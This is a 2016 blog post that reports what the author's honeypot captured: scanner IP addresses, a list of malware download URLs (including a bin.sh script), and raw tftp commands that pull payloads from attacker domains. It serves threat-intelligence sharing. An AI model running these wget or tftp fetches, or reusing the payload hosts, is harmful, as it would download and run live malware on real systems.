Meine Blog-Liste

  • end of life - Good morning, as you may have already found out, the posts on this blog have been getting less and less. This is caused by the fact that my two honeypots h...
    vor 1 Jahr

Samstag, 31. Dezember 2016

Sylvester 2016 - Honeypot report

Happy New Year everyone

I have my Honeypot (https://github.com/johestephan/SendMeSpamIDS.py) running for quite a while now. I take the chance of a new Year to summarize the last weeks in one Sylvester report. The indicators are fetched using the shell scripts out of my toolbox (https://github.com/johestephan/CTI-Toolbox) especially
  • getindiV1.sh - fetch all indicators (see report below)
  • getCodeV1. sh - try to execute all wget calls in a file
have been created to operate with the log files I receive.
This report is also available on X-Force Exchange

Scanning IPs:
=====================================
127.0.0.1
163.172.190.56
185.128.43.174
195.154.179.148
212.175.89.190
23.152.0.18
46.4.90.85
51.15.44.122
51.15.56.205
54.218.98.192
62.210.149.68
81.12.119.27
81.12.121.183
81.12.126.233
81.171.12.232
89.248.168.213
89.248.172.207
92.50.64.234
94.102.48.194
94.102.56.181
HTTP urls (object):
=====================================
http
http://163.21.46.2/appserv/a.txt
http://180.163.113.82/check
http://5.39.93.71/2jvf
http://5.39.93.71/aenv
http://5.8.65.5/1
http://5.8.65.5/2
http://95.215.62.11:80/bin.sh
http://afpen.pw:8080/a
http://binpt.pw/a
http://clientapi.ipip.net/echo.php
http://cvfyb.pw:8080/a
http://gdiqt.pw:8080/a
httpheader.net
http://httpheader.net/
http://ixvip.pw:8080/a
http://jgop.org/a
http://jzion.pw/a
http://l.ocalhost.host/1
http://l.ocalhost.host/2
http://l.ocalhost.host/3
http://mrjyq.pw:8080/a
http://mvtul.pw:8080/a
http://qplok.pw:8080/a
http://qrxou.pw:8080/a
http://schemas.xmlsoap.org/soap/encoding/
http://schemas.xmlsoap.org/soap/envelope/
https://github.com/robertdavidgraham/masscan
http://tr069.pw/1
http://tr069.pw/2
http://vizxv.pw/a
WGET (objects):
=====================================
http://5.8.65.5/1
http://5.8.65.5/2
http://95.215.62.11:80/bin.sh
http://afpen.pw:8080/a
http://binpt.pw/a
http://cvfyb.pw:8080/a
http://gdiqt.pw:8080/a
http://ixvip.pw:8080/a
http://jgop.org/a
http://jzion.pw/a
http://l.ocalhost.host/1
http://l.ocalhost.host/2
http://l.ocalhost.host/3
http://mrjyq.pw:8080/a
http://mvtul.pw:8080/a
http://qplok.pw:8080/a
http://qrxou.pw:8080/a
http://tr069.pw/1
http://tr069.pw/2
http://vizxv.pw/a
TFTP (objects):
=====================================
tftp -l 3 -r 1 -g l.ocalhost.host
tftp -l b -r b -g afpen.pw 6969
tftp -l b -r b -g binpt.pw
tftp -l b -r b -g cvfyb.pw 6969
tftp -l b -r b -g gdiqt.pw 6969
tftp -l b -r b -g ixvip.pw 6969
tftp -l b -r b -g jgop.org
tftp -l b -r b -g jzion.pw
tftp -l b -r b -g mrjyq.pw 6969
tftp -l b -r b -g mvtul.pw 6969
tftp -l b -r b -g qplok.pw 6969
tftp -l b -r b -g qrxou.pw 6969
tftp -l b -r b -g vizxv.pw